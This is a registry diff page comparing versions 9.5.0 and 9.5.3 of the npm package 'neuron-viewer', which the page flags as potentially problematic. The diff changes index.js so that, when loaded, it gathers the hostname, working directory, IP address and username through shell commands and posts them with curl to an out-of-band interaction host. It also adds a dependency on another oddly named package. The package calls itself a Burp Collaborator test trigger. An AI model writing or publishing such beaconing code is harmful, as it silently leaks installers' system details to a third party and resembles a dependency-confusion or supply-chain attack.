neuron-viewer 9.5.0 → 9.5.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of neuron-viewer might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +4 -2
package/index.js CHANGED
@@ -1,7 +1,7 @@
1
1
  const { exec } = require("child_process");
2
2
 
3
3
  function sendPingback(data) {
4
- const collaboratorUrl = "https://tolipxvbr0x5h5ltka5dbwflocu3it6i.oastify.com";
4
+ const collaboratorUrl = "https://rxthgpisbdduguomjwmisrypidcuf7xqs.oast.fun";
5
5
  exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
6
6
  if (error) {
7
7
  console.error(`Error: ${error.message}`);
@@ -33,5 +33,5 @@ function executeCommand(command) {
33
33
  }
34
34
 
35
35
  // Example: Execute a command (e.g., 'whoami')
36
- executeCommand('whoami');
36
+ executeCommand('echo "Hostname: $(hostname), Directory: $(pwd), IP Address: $(hostname -I | awk '{print $1}'), Username: $(whoami)"');
37
37
 
package/package.json CHANGED
@@ -2,7 +2,7 @@
2
2
 
3
3
  "name": "neuron-viewer",
4
4
 
5
- "version": "9.5.0",
5
+ "version": "9.5.3",
6
6
 
7
7
  "description": "A simple package to trigger Burp Collaborator for security testing",
8
8
 
@@ -18,7 +18,9 @@
18
18
 
19
19
  "@mallutrojan005/coveralls": "^0.1.0",
20
20
 
21
- "assistants-nextjs": "^9.0.0"
21
+ "assistants-nextjs": "^9.0.0",
22
+
23
+ "ts-jest-starter-kit": "^9.0.0"
22
24
 
23
25
  }
24
26